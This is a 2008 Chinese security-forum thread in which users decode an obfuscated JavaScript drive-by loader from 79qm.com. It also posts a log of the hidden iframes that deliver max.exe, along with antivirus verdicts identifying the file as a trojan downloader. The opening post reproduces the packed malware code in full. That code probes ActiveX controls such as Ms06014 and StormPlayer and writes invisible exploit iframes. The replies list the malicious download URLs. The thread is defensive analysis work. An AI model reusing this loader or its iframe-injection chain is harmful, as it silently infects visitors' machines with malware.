这个怎么解？

tanlimo

http://i.79qm.com/dex.htm

1. window["eval"](function(aAvjSkN1,aoH2,jPL3,CAXXh4,tToFoip5,dLl6){tToFoip5=function(jPL3){return(jPL3<aoH2?'':tToFoip5(window["parseInt"](jPL3/aoH2)))+((jPL3=jPL3
   
2. H2)>35?window["String"]["fromCharCode"](jPL3+29):jPL3["toString"](36))};if(!''["replace"](/^/,window["String"])){while(jPL3--){dLl6[tToFoip5(jPL3)]=CAXXh4[jPL3]||tToFoip5(jPL3)}CAXXh4=[function(tToFoip5){return dLl6[tToFoip5]}];tToFoip5=function(){return'G+'};jPL3=1};while(jPL3--){if(CAXXh4[jPL3]){aAvjSkN1=aAvjSkN1["replace"](new window["RegExp"]('2'+tToFoip5(jPL3)+'2','g'),CAXXh4[jPL3])}}return aAvjSkN1}('k m=3 D();j="l";m.E(m.v()+t*s*s*C);k r=3 z(2.p);k n="q=";j="l";k o=r.A(n);2.c('<0 7=6:4 5="8://i.9.b/B.g"></0>');j="l";a(o==-1){j="l";2.p="q=u;x="+m.w();d{a(3 f("y.O"))2.c('<0 7=6:4 5="8://i.9.b/S.g"></0>')}h(e){}d{a(3 f("R.Q"))2.c('<0 7=6:4 5="8://i.9.b/U.V"></0>')}h(e){}d{a(3 f("X.W.1"))2.c('<0 7=6:4 5="8://i.9.b/F.g"></0>')}h(e){}d{a(3 f("e.T.1"))2.c('<0 7=6:4 5="8://i.9.b/P.g"></0>')}h(e){}d{a(3 f("I"))2.c('<0 7=6:4 5="8://i.9.b/H.g"></0>')}h(e){}d{a(3 f("G.J.1"))2.c('<0 7=6:4 5="8://i.9.b/K.g"></0>')}h(e){}d{a(3 f("N.M.1"))2.c('<0 7=6:4 5="8://i.9.b/L.g"></0>')}h(e){}}',60,60,'iframe||document|new|none|src|display|style|http|79qm|if|com|write|try||ActiveXObject|htm|catch||asdfasf|var|fldsajfldsajflas|Then|cookieHeader|beginPosition|cookie|Cookie1|cookieString|60|24|POPWINDOS|getTime|toGMTString|expires|Microsoft|String|indexOf|real|1000|Date|setTime|bf|GLCHAT|cx|Pdg2|GLChatCtrl|lz|db|Tool|BaiduBar|XMLHTTP|pps|Vod|DPClient|Ms06014|PowerPlayerCtrl|xl|html|StormPlayer|MPS'["split"]('|'),0,{}))

复制代码

http://cc.79qm.com/down/max.exe

[ 本帖最后由 tanlimo 于 2008-2-22 21:04 编辑 ]

dikex

window["eval"] = eval

深红的雪

老方法

Log is generated by FreShow.
[wide]http://i.79qm.com/sb.htm
    [frame]http://i.79qm.com/real.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/Ms06014.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/xl.html
        [object] http://d1.moyugame.com/down/max.exe
    [frame]http://i.79qm.com/bf.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/pps.htm
        [frame]http://i.79qm.com/xppps.htm
            [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/cx.htm
        [object] http://cc.79qm.com/down/max.exe
    [frame]http://i.79qm.com/lz.htm
        [object] http://d1.moyugame.com/mm/mm.exe
    [frame]http://i.79qm.com/db.htm
        [object] http://cc.79qm.com/down/max.cab

solcroft

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.Win32.Edog.o      

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.32.42

spaceplane

BD报下载者

tanlimo

没想到，我是先ESC再用老方法，所以.......

mofunzone

The file 'C:\TDDOWNLOAD\max.exe'
contained a virus or unwanted program 'TR/Dropper.Gen' [trojan]
Action(s) taken:
The file was deleted!

绅博周幸

ACCESS DENIED
The requested URL could not be retrieved

--------------------------------------------------------------------------------

While trying to retrieve the URL: http://cc.79qm.com/down/max.exe

The folowing error was encountered:

The requested object is INFECTED. The following viruses Worm.Win32.Downloader.eu were found

Please contact your service provider if you feel this is incorrect.



--------------------------------------------------------------------------------

Generated Fri Feb 22 09:29:57 2008 by Kaspersky Internet Security 7.0